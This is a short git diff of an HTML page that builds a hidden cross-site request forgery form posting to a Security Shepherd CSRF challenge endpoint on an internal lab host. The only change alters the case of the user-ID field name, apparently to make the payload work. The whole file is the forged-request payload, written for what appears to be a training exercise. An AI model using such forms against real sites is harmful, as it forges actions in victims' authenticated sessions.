--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 
     <body>
         <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengethree/plusplus" method="POST" >
-            <input type="hidden" name="userId" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3" />
+            <input type="hidden" name="userid" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3" />
             <input type="hidden" name="csrfToken" value="-161699926159196303063208050832052286748" />
         </form>
 
